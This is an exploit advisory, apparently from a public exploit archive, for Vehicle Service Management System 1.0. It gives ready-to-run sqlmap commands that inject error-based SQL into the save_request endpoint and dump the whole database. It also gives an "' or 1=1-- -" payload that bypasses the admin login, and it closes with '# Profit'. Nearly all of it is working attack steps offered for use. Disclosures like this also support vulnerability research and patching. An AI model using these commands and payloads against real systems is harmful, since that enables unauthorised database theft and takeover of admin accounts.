Authored by Richard Jones

Vehicle Service Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities one of which allows for authentication bypass.

# Exploit Title: Vehicle Service Managment 1.0 - SQL Injection Error Based 
# Date: 2021-10-02
# Exploit Author: RICHARD JONES
# Vendor Homepage:
# Software Link:
# Version: v1.0
# Tested on: Windows 10

Step 1 - Open sqlmap
Step 2 – Enter the payload string for sqlmap (edit localhost to site address)
Setp 3 - Dump database info.

SQLMAP Command:

sqlmap -u "http://localhost/vehicle_service/classes/Master.php?f=save_request" --data "id=1&category_id=2&owner_name=aa&contact=aa&[]=3&service_type=Pick+Up&pickup_address=aa" -p id --batch --technique=E


Parameter: id (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 8850 FROM(SELECT COUNT(*),CONCAT(0x716a706b71,(SELECT (ELT(8850=8850,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- bdrq&category_id=2&owner_name=aa&contact=aa&[]=3&service_type=Pick Up&pickup_address=aa

Step 3:

Dump the entire database.

sqlmap -u "http://localhost/vehicle_service/classes/Master.php?f=save_request" --data "id=1&category_id=2&owner_name=aa&contact=aa&[]=3&service_type=Pick+Up&pickup_address=aa" -p id --batch --dump

# Exploit Title: Vehicle Service Managment 1.0 - SQL Authentication Bypass
# Date: 2021-10-02
# Exploit Author: RICHARD JONES
# Vendor Homepage:
# Software Link:
# Version: v1.0
# Tested on: Windows 10

Step 1 - Goto http://site/admin/login.php (to login)
Step 2 – Enter the payload below for username and password
Setp 3 - Login as admin!


' or 1=1-- -

# Profit